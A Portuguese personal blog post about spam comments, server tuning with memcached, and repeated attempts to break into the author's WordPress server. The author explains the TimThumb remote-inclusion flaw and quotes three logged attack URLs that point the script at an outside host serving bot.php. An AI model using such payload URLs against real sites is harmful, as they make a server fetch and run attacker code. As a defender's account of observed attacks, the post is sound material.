Blog do Eduardo Costa Meu blog pessoal

13Jan/120

Spam flood

Por alguma razão que não conheço, meu blog foi inundado por spam. Tive que apagar 67 comentários desse tipo e agora fui obrigado a adotar o akismet. Talvez tenha sido eles, tentando vender o produto. O interessante é: nenhum dos comentários tinha links. O que me motivou a escrever foi ver no site do akismet a informação que blog spammers contrata mão-de-obra barata para fazer o trabalho dos bots. Isso explica a criatividade dos textos. Ou seja, mais uma fonte de renda exploratória para quem não quer um trabalho de verdade!

8Nov/110

Memcached, Jira e mais tentativas de invasão

Vamos a boa notícia: como sobraram alguns megas na memória do servidor, instalei um memcached e, agora, o blog usa-o para fazer cache em memória. Nem preciso dizer que a carga do servidor foi lá em baixo. Ou seja, continuo com a máquina mais fuleira da Amazon (míseros 600mb de memória) e ainda consigo hospedar um site inteiro com boa performance. Claro que essa memória liberada foi graças a remoção dos serviços de e-mail (postfix e dovecot) - migrei tudo para o Google Apps.

Estou testando também o Jira On-Demand. A intenção é substituir o horrível Mantis por algo mais útil e, de bônus, não precisar gerenciar mais um servidor. US$ 10 por mês seria o custo de uma instância t1.micro na Amazon, com a desvantagem que o Jira ajuda no bom nome do Java sendo absurdamente pesado, inviabilizando usar uma instância tão simples. Então, prefiro pagar US$ 10 em algo que eu não precise dar manutenção - com a vantagem que, se o Jira provar seu valor (tenho ainda um mês de trial), eu posso fazer uma assinatura anual e derrubar o custo para uns US$ 8 por mês! Com isso, meus projetos na Apple Store ganham uma URL mais profissional e amigável.

Como nem tudo são flores, fui dar uma entrada rápida na home do meu blog no trabalho para testar a velocidade em outra rede, quando, mais uma vez, estava tudo travado - algo estranho para um site que devia estar super-rápido. Na hora do almoço, entrei no servidor e descobri script-kiddies tentando invadir o sistema. Dessa vez foram dois de uma vez, e com o mesmo truque. Existe um tal de TimThumb, que contém uma verdadeira cratera de segurança: ele aceita receber conteúdo externo vindo de sites como "youtube.com", "wordpress.com" e afins, mas não só aceita código executável (!!!), como também valida o remetente via "substring" (sim, aceita "wordpress.com.hostdail.com", por exemplo!!!!!).

Lindo, típico serviço de alguém que aprender a programar ontem. O divertido foi como descobriram a falha. O blog do criador do "plugin" foi invadido por uma broca em sua própria criação. Depois tem gente que pergunta por que não gosto de libs. Eu não uso esse traste, nem meu tema usa, mas hoje, novamente, meu servidor foi a 100% graças a dois idiotas que não sabem processar códigos de erro HTTP (sim, novamente). Olhando nos logs, descobri que o casal 1/20 tentava carregar os seguintes endereços:

  • //wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/logs/logs.php
  • //wp-content/themes/boast/functions/timthumb.php?src=http://wordpress.com.hostdail.com/bot.ph
  • /category/geek//wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/
    bot.php

Sim, com duas barras Deus-sabe-o-porquê, e um tema que não tenho instalado. Seria só mais uma tentativa frustrada se "Debi e Lóide" não ficassem tentando os mesmos endereços incessantemente. Detalhe: esses arquivos nem existem! Já criei uma categoria para o que faço de configuração em servidores - daqui a pouco, com tanta besteira que estou pegando, vou ter que criar um blog inteiro!

PS: Agora, virou os três patetas... O terceiro idiota acabou de tentar invadir. Pelo menos, esse tentou com mais de uma URL. Ele era britânico (server1.edjeavons.co.uk) e agora faz parte dos meus bloqueios do iptables.